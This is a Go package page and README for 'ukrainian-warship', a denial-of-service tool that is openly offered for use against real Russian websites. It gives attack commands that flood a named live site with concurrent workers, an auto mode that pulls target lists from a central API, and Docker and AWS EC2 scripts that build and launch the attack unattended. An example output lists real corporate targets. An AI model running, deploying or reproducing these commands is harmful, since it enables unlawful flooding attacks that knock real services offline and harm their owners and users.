ukrainian-warship

command module
v0.0.0-...-967286a Latest Latest
Warning

This package is not in the latest version of its module.

Go to latest
Published: Mar 11, 2022 License: Apache-2.0 Imports: 1 Imported by: 0

README

 _   _ _              _       _               _    _                _     _       
| | | | |            (_)     (_)             | |  | |              | |   (_)      
| | | | | ___ __ __ _ _ _ __  _  __ _ _ __   | |  | | __ _ _ __ ___| |__  _ _ __  
| | | | |/ / '__/ _` | | '_ \| |/ _` | '_ \  | |/\| |/ _` | '__/ __| '_ \| | '_ \ 
| |_| |   <| | | (_| | | | | | | (_| | | | | \  /\  / (_| | |  \__ \ | | | | |_) |
 \___/|_|\_\_|  \__,_|_|_| |_|_|\__,_|_| |_|  \/  \/ \__,_|_|  |___/_| |_|_| .__/ 
                                                                           | |    
                                                                           |_|  go birrr  

Too fat to fight? Still want to do your part?
Then we have just what you need! Strap your self in to you very own Ukrainian Warship and take aim!

Ukrainian Warship features:

  • Acquire targets directly form IT ARMY of Ukraine
  • Automatically detects online targets
  • Stolen code from popular https stress test tool
  • The pockets of dead target will gown sunflowers

Usage

There are two modes of attack, single target and auto. Unless a target is specified ukrainian-warship will start in auto. Auto attack acquires targets from a central api and takes aim at those.


Single target example:

ukrainian-warship kill --target=https://tvzvezda.ru/ --workers=64

--target=https://tvzvezda.ru/ the url you want to attack
--workers=64 number of workers specifies the number of concurrent calls to the URL


Auto example:

ukrainian-warship kill --workers=64

--workers=64 number of workers specifies the number of concurrent calls for each URL
--debug=true this flag an be added for more detailed output

Install

Docker
docker pull sunflowerpockets/ukrainian-warship:latest
docker run -ti --rm sunflowerpockets/ukrainian-warship:latest kill --workers=24
AWS EC2 User Data for Ubuntu Server 20.04 LTS
#!/bin/bash

apt update -y
apt upgrade -y
cd root
curl -OL https://go.dev/dl/go1.17.7.linux-amd64.tar.gz
tar -C /usr/local -xvf go1.17.7.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
git clone https://github.com/seedpockets/ukrainian-warship.git
cd ukrainian-warship/
mkdir bin
go build -ldflags "-s -w" -o /root/ukrainian-warship/bin/ukrainian-warship
chmod +x /root/ukrainian-warship/bin/ukrainian-warship
/root/ukrainian-warship/bin/ukrainian-warship kill > /dev/null
Ubuntu Server 20.04 LTS
#!/bin/bash

sudo apt update -y
sudo apt upgrade -y
curl -OL https://go.dev/dl/go1.17.7.linux-amd64.tar.gz
sudo tar -C /usr/local -xvf go1.17.7.linux-amd64.tar.gz
echo export PATH=$PATH:/usr/local/go/bin >> ~/.profile
source ~/.profile
git clone https://github.com/seedpockets/ukrainian-warship.git
cd ukrainian-warship/
mkdir bin
go build -ldflags "-s -w" -o bin/ukrainian-warship
chmod +x bin/ukrainian-warship
bin/ukrainian-warship kill    

Example output:

 Updates targets every 5 min...


Target
_________________________________________________________
https://www.nornickel.com/
https://rmk-group.ru/ru/
https://www.evraz.com/ru/
https://nangs.org/
https://www.metalloinvest.com/
https://www.polymetalinternational.com/ru/
https://www.sibur.ru/
https://www.uralkali.com/ru/
https://www.tmk-group.ru/
Total:  10
⣻

Documentation

Overview

Copyright © 2022 NAME HERE [email protected]

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

Directories

Path Synopsis
pkg

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL
JackTT - Gopher 🇻🇳